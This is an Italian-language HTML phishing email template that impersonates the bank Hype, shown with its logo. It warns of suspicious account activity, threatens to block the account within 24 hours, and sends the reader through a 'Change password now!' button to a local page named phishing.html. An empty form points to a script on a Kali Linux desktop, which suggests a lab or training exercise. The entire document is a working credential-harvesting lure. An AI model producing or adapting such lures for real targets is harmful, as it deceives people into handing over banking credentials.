<!DOCTYPE html>
<html lang="it">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Avviso di Sicurezza</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            color: #333;
            background-color: #f4f4f4;
            margin: 0;
            padding: 0;
            text-align: center;
        }
        .container {
            max-width: 600px;
            margin: 50px auto;
            padding: 20px;
            background-color: #fff;
            border: 1px solid #ddd;
            border-radius: 5px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
        }
        h1 {
            color: #3c56e7;
        }
        p {
            line-height: 1.6;
        }
        .button {
            display: inline-block;
            padding: 10px 20px;
            font-size: 16px;
            color: #fff;
            background-color: #3498db; /* Blu vivace */
            text-decoration: none;
            border-radius: 5px;
            margin-top: 10px;
        }
        .button:hover {
            background-color: #2980b9; /* Colore blu più scuro al passaggio del mouse */
        }
    </style>
</head>
<body>
    <div class="container">
        <header>
            <img src="https://ci3.googleusercontent.com/meips/ADKq_NbU3vc2fkWp-vTD1Ck8wWhv4sGG16Gs7tgUzsloWcdPmP6n39-UdZt9Akc4bd9BJjKKdIT5W5t9yfbcmw=s0-d-e1-ft#https://www.hype.it/mail/logo-hype.png" alt="Logo Aziendale" style="max-width: 200px;">
        </header>
        <h1>Avviso di Sicurezza Importante</h1>
        <p>Gentile Utente,</p>
        <p>Abbiamo rilevato un'attività sospetta sul tuo account. Per proteggere la tua sicurezza, è necessario che tu cambi la tua password immediatamente.</p>
        <p>Se non effettui il cambiamento della password entro 24 ore, il tuo account potrebbe essere bloccato.</p>
        <a href="http://127.0.1.1:8080/phishing.html" class="button">Change password now!</a>
        <form action="/home/kali/Desktop/FF.py" method="post"></form>
        <p>Grazie per la tua comprensione e collaborazione.</p>
        <p>Il Team di Sicurezza</p>
        <p><small>Note: Questa è una comunicazione automatica. Per qualsiasi domanda, contatta il nostro support.</small></p>
    </div>
</body>
</html>
